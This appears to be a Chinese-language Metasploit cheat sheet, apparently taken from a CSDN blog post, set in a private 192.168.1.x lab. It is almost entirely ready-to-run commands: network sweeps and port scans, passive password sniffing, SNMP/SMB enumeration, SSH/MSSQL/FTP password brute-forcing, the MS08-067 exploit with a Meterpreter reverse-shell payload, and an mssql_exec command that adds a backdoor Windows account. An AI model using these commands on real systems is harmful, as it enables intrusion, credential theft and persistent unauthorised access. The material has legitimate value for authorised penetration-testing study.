主机发现扫描
search arp
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.0/24
set INTERFACE eth0
set THREADS 20 #线程数
run
端口扫描
search portscan
use auxiliary/scanner/portscan/syn #选择syn扫描
show options
set INTERFACE eth0
set PORTS 80
set RHOSTS 192.168.1.0/24
set THREADS 50
run
IPID Idle扫描(僵尸机扫描)
use auxiliary/scanner/ip/ipidseq
show options
set RHOSTS 192.168.1.1-150
set THREADS 20
run
也可以用nmap
msf > db_nmap -PN -sI 192.168.1.110
UDP扫描
use auxiliary/scanner/discovery/udp_sweep
show options
set RHOSTS 192.168.1.1-150
run
use auxiliary/scanner/discovery/udp_probe
show options
set RHOSTS 192.168.1.1-150
set CHOST 192.168.1.111
set THREADS 20
run
密码嗅探(被动信息扫描)
search sniffer
use auxiliary/sniffer/psnuffle
show options
set INTERFACE eth0
run
#也可以从pcap读取
set PCAPFILE /root/ftp.pcapng
jobs
kill 0 #把之前的kill
run
SNMP扫描
Linux
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.111
set THREADS 20
run
use auxiliary/scanner/snmp/snmp_enum
show options
set RHOSTS 192.168.1.111
run
windows
use auxiliary/scanner/snmp/snmp_enumusers
show options
set COMMUNITY jlcssadmin
set RHOSTS 192.168.1.112
run
use auxiliary/scanner/snmp/snmp_enumshares
show options
set COMMUNITY jlcssadmin
set RHOSTS 192.168.1.112
run
SMB扫描
#SMB版本扫描
use auxiliary/scanner/smb/smb_version
#扫描命令管道。判断 SMB 服务类型(账号、密码)
use auxiliary/scanner/smb/pipe_auditor
#扫描通过SMB管道可以访问的DCERPC服务
use auxiliary/scanner/smb/pipe_dcerpc_auditor
#SMB 共享账号(账号、密码)
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
#SID 枚举(账号、密码)
use auxiliary/scanner/smb/smb_lookupsid
SSH扫描
#SSH 版本扫描
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.126
run
#SSH 密码爆破
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.126
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
(现成的字典)
set VERBOSE false
run
#SSH 公钥登陆
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS 192.168.1.126
set USERNAME root
set KEY_PATH id_rsa_test_file
获取 windows 缺少的补丁
基于已经取得的session进行检测
use post/windows/gather/enum_patches
set SESSION 4
show advanced
set VERBOSE yes
run
#ms08-067
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.126
set payload windows/meterpreter/reverse_tcp
run
mssql 扫描
#尝试ping,确定端口
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS 192.168.1.126
run
#爆破 mssql 密码
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 192.168.1.126
set username Administrator
set password ... #这里只能填单个密码；若要使用密码字典，应改用 PASS_FILE 选项
run
#远程执行代码(获取数据库权限之后)
use auxiliary/admin/mssql/mssql_exec
set RHOSTS 192.168.1.114 #自己的kali
set username Administrator
set password ... #这里是破解出来的密码
set CMD net user user1 pass123 /ADD #执行代码,在数据库里面加一个账号
FTP 扫描
#查询版本信息
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.126
run
#是否允许匿名登录
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.168.1.126
run
#暴力破解
use auxiliary/scanner/ftp/ftp_login
原文地址:https://fishpond.blog.csdn.net/article/details/105788422